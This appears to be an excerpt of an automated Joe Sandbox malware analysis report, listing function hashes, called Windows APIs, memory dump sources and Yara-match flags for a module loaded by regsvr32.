                                                                      • Opcode Fuzzy Hash: a3f87b8c5f367064f797f5b9ceb23e0cb6ebb80f3dcd78d3f9f2145c33283283
                                                                      • Instruction Fuzzy Hash: 2051F021B1868381FB209B21AC567BA22D2FF96384F4CC136DE0C46EDECFBCE1059201
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerEntryFunctionLookupPresentTerminateUnwindVirtual
                                                                      • String ID:
                                                                      • API String ID: 3778485334-0
                                                                      • Opcode ID: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                      • Instruction ID: 83dde26e0394166d82c23feffab097d2cefe70178072827e2d6d8e2f7b8beffe
                                                                      • Opcode Fuzzy Hash: 44244c45948aa76910f1429c67e23cf948153936c8457040e3babb9890c0c3d8
                                                                      • Instruction Fuzzy Hash: A131E232908B86C5EB119B14FC943AA73E4FB86344F588036DA8D42B6DDFBCE088C701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • _lock.LIBCMT ref: 00007FFA526AE6EB
                                                                      • free.LIBCMT ref: 00007FFA526AE7E2
                                                                        • Part of subcall function 00007FFA526A3024: HeapFree.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A303A
                                                                        • Part of subcall function 00007FFA526A3024: _errno.LIBCMT ref: 00007FFA526A3044
                                                                        • Part of subcall function 00007FFA526A3024: GetLastError.KERNEL32(?,?,00000000,00007FFA526A2DDC,?,?,?,00007FFA526A2DFF,?,?,?,00007FFA526A254F,?,?,?,00007FFA526A262A), ref: 00007FFA526A304C
                                                                      • ___lc_codepage_func.LIBCMT ref: 00007FFA526AE76B
                                                                        • Part of subcall function 00007FFA526A6550: RtlCaptureContext.KERNEL32 ref: 00007FFA526A658F
                                                                        • Part of subcall function 00007FFA526A6550: IsDebuggerPresent.KERNEL32 ref: 00007FFA526A662D
                                                                        • Part of subcall function 00007FFA526A6550: SetUnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6637
                                                                        • Part of subcall function 00007FFA526A6550: UnhandledExceptionFilter.KERNEL32 ref: 00007FFA526A6642
                                                                        • Part of subcall function 00007FFA526A6550: GetCurrentProcess.KERNEL32 ref: 00007FFA526A6658
                                                                        • Part of subcall function 00007FFA526A6550: TerminateProcess.KERNEL32 ref: 00007FFA526A6666
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerErrorFreeHeapLastPresentTerminate___lc_codepage_func_lockfree
                                                                      • String ID:
                                                                      • API String ID: 178205154-0
                                                                      • Opcode ID: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                      • Instruction ID: 0536c4ec7bf5b27169877939ed25b95e181c05ac9460494b792dee3f7c26bc1e
                                                                      • Opcode Fuzzy Hash: 74de64cbd29ae749c01db9c906a5c8058d145dff36747eda2fd1744b72fc25a1
                                                                      • Instruction Fuzzy Hash: BAD1A222E08282C5E7609F249C5167976D6FF87740F48C135DA8E57E9ECFBCE8519701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526ADFF2
                                                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE004
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE04F
                                                                      • GetLocaleInfoW.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE0E1
                                                                      • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE11B
                                                                      • free.LIBCMT ref: 00007FFA526AE12F
                                                                        • Part of subcall function 00007FFA526A6C34: _FF_MSGBANNER.LIBCMT ref: 00007FFA526A6C64
                                                                        • Part of subcall function 00007FFA526A6C34: RtlAllocateHeap.NTDLL(?,?,00000000,00007FFA526A30C0,?,?,00000000,00007FFA526A6B19,?,?,00000000,00007FFA526A6BC3), ref: 00007FFA526A6C89
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CAD
                                                                        • Part of subcall function 00007FFA526A6C34: _errno.LIBCMT ref: 00007FFA526A6CB8
                                                                      • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,?,?,?,00007FFA526AE1C2), ref: 00007FFA526AE145
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$_errno$AllocateByteCharErrorHeapLastMultiWidefree
                                                                      • String ID:
                                                                      • API String ID: 2309262205-0
                                                                      • Opcode ID: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                      • Instruction ID: 7626336b7c3cac7a89bd0f4da3d72910e3368512d92bf1e03118835db621df02
                                                                      • Opcode Fuzzy Hash: 71a04b091aa06e394b105ea5eb29500c7d2471e259f2c6ae1c50144f40b044a4
                                                                      • Instruction Fuzzy Hash: F8519E32A08692C6EB649F219C4156963E2FB467A4F5C8635DA1E53FDCCFBCE8509300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: _errno$DecodePointer_lock
                                                                      • String ID:
                                                                      • API String ID: 2175075375-0
                                                                      • Opcode ID: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                      • Instruction ID: 2f5846bf177c5d7c2a8d405d90712e50eb5f323273204edc7d8efa8f4c0a2a8b
                                                                      • Opcode Fuzzy Hash: e83d4e1a308f3a4c606242a395cb5e969118d697d0d9f70e8103cd5b86654c3e
                                                                      • Instruction Fuzzy Hash: 8E316F22A18653C2FB15AB61985277A61D1EF86780F18C534DA0D4BFCEDFADD411A701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmp
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmp
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: ExceptionFilterProcessUnhandled$CaptureContextCurrentDebuggerPresentTerminate
                                                                      • String ID:
                                                                      • API String ID: 1269745586-0
                                                                      • Opcode ID: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                      • Instruction ID: 84aa14fe649d3bef65d9e23b9ff0817ff10448864e03f6619a845a4328d15e09
                                                                      • Opcode Fuzzy Hash: 4b9ca92828b1b5c60ed307038ce46a3bf90eb6ca82a158dafa7f71ad6e682487
                                                                      • Instruction Fuzzy Hash: 49311C32A0CBC682EA248B54E8443AAB3E4FB8A744F544135DB8D43E5DDFBCD189CB00
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: "+H$1l7.$M8;$]$d$]k$]k$94
                                                                      • API String ID: 0-2447245168
                                                                      • Opcode ID: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction ID: 1221e244f5383d3e6569bf50eb566ee92e7d288cf12f4405919b94e37960c7a7
                                                                      • Opcode Fuzzy Hash: 3fd6bef9004380659c47559ba6e3d81fe5eea7f701e849f333ef0deba45e7d13
                                                                      • Instruction Fuzzy Hash: 3FB10D7160130CCBDBA9DF28C18A6DA3BE1FF48748F114129FD1A97261D774E919CB46
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                      • Instruction ID: c9338d8ec67f65fb279d1c920d9504fe033765055d1d95ac2d28c8faeb464c4b
                                                                      • Opcode Fuzzy Hash: 388ed1ec509bc17a1b1080bf0c7b12a90c89964bfa9f21f0ca41505682e31820
                                                                      • Instruction Fuzzy Hash: 67213E22B08683C5FA609B21ED612B963E0FF56784F8CC131DA4D46D99EFACE945D700
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1h$I-$IY$QL&$li7$o
                                                                      • API String ID: 0-890095520
                                                                      • Opcode ID: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                      • Instruction ID: 3309774e0679b3a301b7d0c809474a48ec240f33eb9a68417431e078f6a2137f
                                                                      • Opcode Fuzzy Hash: d92cde7f9b8773e82faae5f21764c68a430e9ac7962d305d8d3ec3a014b69236
                                                                      • Instruction Fuzzy Hash: 72921875604BC88BCBB8DF24DC85BDD7BE0FB86305F20561DD85E9AA60CBB85645CB02
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 1$ {,$"$$-%$Rku$ i
                                                                      • API String ID: 0-1845893065
                                                                      • Opcode ID: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                      • Instruction ID: cb6ea2ed9b9de3b3effb5fe074f3157ffd1060f729125c5012da7c2884d2f589
                                                                      • Opcode Fuzzy Hash: 8a8483899f0d6f446eebdfc8e7bf7c7542960c12dc616770c4deeefd42d211ba
                                                                      • Instruction Fuzzy Hash: EB52D470544BCA8BCBB8CF24CC85BEF7BA0FB44306F155529D89A8A291DBB85749CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: VUS/$YV~$p$@$EX$OX
                                                                      • API String ID: 0-2743166816
                                                                      • Opcode ID: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                      • Instruction ID: 6ceb6cba6b0314249f0ec67deadc173c496f62a90fe3cec01f017443767c42d8
                                                                      • Opcode Fuzzy Hash: 5155f202f137bac6474ba6043cf7c54f40f5ffdfe883d22239fc44ed7813b08b
                                                                      • Instruction Fuzzy Hash: BD3213711097848FD3A9CF68C58A65BBBF0FBCA744F104A1DF68687260C7B6D949CB42
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: -!zt$Mv`b$R3T$d}9J$t:v$ru
                                                                      • API String ID: 0-2100131636
                                                                      • Opcode ID: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction ID: abddbd47ac15f5a8ffacaf8e31a06efd054a3dbd2afb1a66e8bbaa14beb483a4
                                                                      • Opcode Fuzzy Hash: e0551372703c1c57f1fc0d9d1de0f1be02ef62f192bed394747547d409ac2d0a
                                                                      • Instruction Fuzzy Hash: C1221BB050478C8BDBB8CF64C9897DD7BB0FB44308F10862DDA5AAB250CBB45686CF59
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $$"`2$lbzZ$lmq$tro$kO
                                                                      • API String ID: 0-2401169580
                                                                      • Opcode ID: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction ID: 279b0f6eedbbacd77816cba7ac57bf6919de5fbe0bc464da326619847ce4fcd1
                                                                      • Opcode Fuzzy Hash: b22a75222821f6640e36d1476563fd6974371582067e8c17588d676730c46316
                                                                      • Instruction Fuzzy Hash: BBF1C3709047488FDBA8DFA8D9867DDBBB1FB48304F20821DD84AEB255DB749A49CF41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: CurrentTime$CountCounterFilePerformanceProcessQuerySystemThreadTick
                                                                      • String ID:
                                                                      • API String ID: 1445889803-0
                                                                      • Opcode ID: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                      • Instruction ID: be4ecc022d71142122834816d8823b1971dbba7c0c908a5462bf79a2c132fad3
                                                                      • Opcode Fuzzy Hash: 223c3edd6aa26ef4227c63ba9b3a174b47cd905fe72dc54f34602d1df15ca246
                                                                      • Instruction Fuzzy Hash: 73018421629A4582EB508F21FD5026573E4FB4AB90F48A530DF9E47BA8DFBCD8958300
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: )#?$EX.$PT$UbA$2f
                                                                      • API String ID: 0-1318892062
                                                                      • Opcode ID: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction ID: a9b5704be98d3dd027f678fe08c59eda011257bdda9cf4ed25ea0f7660729633
                                                                      • Opcode Fuzzy Hash: f9a85fa51538b1a6c0e22373df85dddbbc427f24166f886711afb0f01761c199
                                                                      • Instruction Fuzzy Hash: 8B320DB190078C8BDBB8CF64C8856DD7BF0FB48318F50852DEA1A9B251DBB45685CF98
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: $T$?F$QP|m$qjf$tZp
                                                                      • API String ID: 0-3477398917
                                                                      • Opcode ID: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction ID: e54beaa769b94aae3cb673a52a2b60ade73482c6e5d3d936cdc9b6ae13d51efd
                                                                      • Opcode Fuzzy Hash: a2afc25ca6c2e6ca488c7a804df3743aa45b21aa43371557c2da8ddda12b60f7
                                                                      • Instruction Fuzzy Hash: 0B122870A0470CDFCF69DFA8C08A6DDBBF2FB44344F1091A9E816AB261D7759A19CB41
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: JQ$k&($t$v$x\J
                                                                      • API String ID: 0-1134872184
                                                                      • Opcode ID: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction ID: 7c1fd17b310acde7e359d6be57bcfb6c2dd011f2caef592e77d3cba241376f6b
                                                                      • Opcode Fuzzy Hash: e2b118cac14b957c819117e18deb076f69f9d4e25580e92a2151fd03385e5a66
                                                                      • Instruction Fuzzy Hash: F312E0B0504709EFCB99DF28C18AADE7BF0FB48308F40812AF80A9B254D774DA58DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: R$)H8$?rIc$L==$V
                                                                      • API String ID: 0-2512384441
                                                                      • Opcode ID: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction ID: 6f6f9af97a41f07aad9f9d1cbd67af5334817a93c453241fb2a5d498ae2065c2
                                                                      • Opcode Fuzzy Hash: 0d280c2f9ee604a9d8763362a2e2c249d7a205bc5c068130deea404b5e8e02a7
                                                                      • Instruction Fuzzy Hash: 3541D0B090074E8BCF48CF64D49A5DE7FB0FB68398F20421DE856A6250D3B896A5CFC5
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: Qq$bt$vird$+$S
                                                                      • API String ID: 0-3373980505
                                                                      • Opcode ID: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction ID: 8c34661c01ca41a1498f33dadfb9b2381b3c020394efcb6cfebc1cbd8490f91c
                                                                      • Opcode Fuzzy Hash: 46bb33aa035ecbbdf74cf68df8db4d7c020810c30b71dbb4fbdebc27907f7b4b
                                                                      • Instruction Fuzzy Hash: 8831C2B081038A8FDB45CF64C88A5DE7BF0FB58358F115A19F869A6250D3B4D668CF81
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445515681.00007FFA52661000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFA52660000, based on PE: true
                                                                      • Associated: 00000003.00000002.445501406.00007FFA52660000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446510295.00007FFA526B2000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446607192.00007FFA526B6000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 00000003.00000002.446616160.00007FFA526B9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_7ffa52660000_regsvr32.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale$_getptd
                                                                      • String ID:
                                                                      • API String ID: 1743167714-0
                                                                      • Opcode ID: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                      • Instruction ID: 1fc7b6a291995fbdf86f990162094adec4a6ac8bfd8304ff1f231a9a9fbecc53
                                                                      • Opcode Fuzzy Hash: b0fda2b9e43f1133ad190798799e4c2ffbba67a865a56d93994de7f284044248
                                                                      • Instruction Fuzzy Hash: 76619A73B08A86D7DA689B64DD943E973E0FB8A301F188136D75D87A88CF7CE4649701
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: V$@$P9$^_"
                                                                      • API String ID: 0-1880944046
                                                                      • Opcode ID: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction ID: ef3f81825b514374c5d287d432cdf068934c0dc0259921085eace1de493a05f6
                                                                      • Opcode Fuzzy Hash: 14fe4b6354f8c882e246ec0bcf45ce0c6e4a33b057813c2d4cef38f5cb1d7b15
                                                                      • Instruction Fuzzy Hash: B6F1DF70504749EFCB98CF28D18AACE7BE0FB48348F50812AF81A9B264D770DA59DB45
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: =_$F)k$b/$syG
                                                                      • API String ID: 0-3955183656
                                                                      • Opcode ID: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction ID: 3a63fdd7148b145f5d2717dabea2a2fa508061acbcc25a132c341bfe6e9ad30f
                                                                      • Opcode Fuzzy Hash: a0c8fbb251499c36d1c33fbfac3bbb926034851086b3556ae4bae43476727e6a
                                                                      • Instruction Fuzzy Hash: DED12771A0478D8BCF59DFA8C88A6EEBBB0FB48344F10421DE846A7650D7B4D909CF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: #X$'Xsa$iJ6$vG
                                                                      • API String ID: 0-746338152
                                                                      • Opcode ID: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction ID: 8ba50615c78112980223cca8f04f1fa67c4b69ee5a809e4e0bd2b8ae6832a1bb
                                                                      • Opcode Fuzzy Hash: 05ea12fd72043b3df7b90193803f13f9b9661e31632ee757fcd333ad07ef3f6f
                                                                      • Instruction Fuzzy Hash: 93E154B590070DDFCB88DF68D19A9DD7BB9BB49308F404029FC0E9A264D3B4E919CB56
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.445135436.0000000180001000.00000020.00001000.00020000.00000000.sdmp, Offset: 0000000180001000, based on PE: false
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_3_2_180001000_regsvr32.jbxd
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: *i^$MIC$-Z$]2
                                                                      • API String ID: 0-498664264
                                                                      • Opcode ID: db11ef6343568e39e87295be28a4fb69218d9fc865c563580501f4fd78a225ea
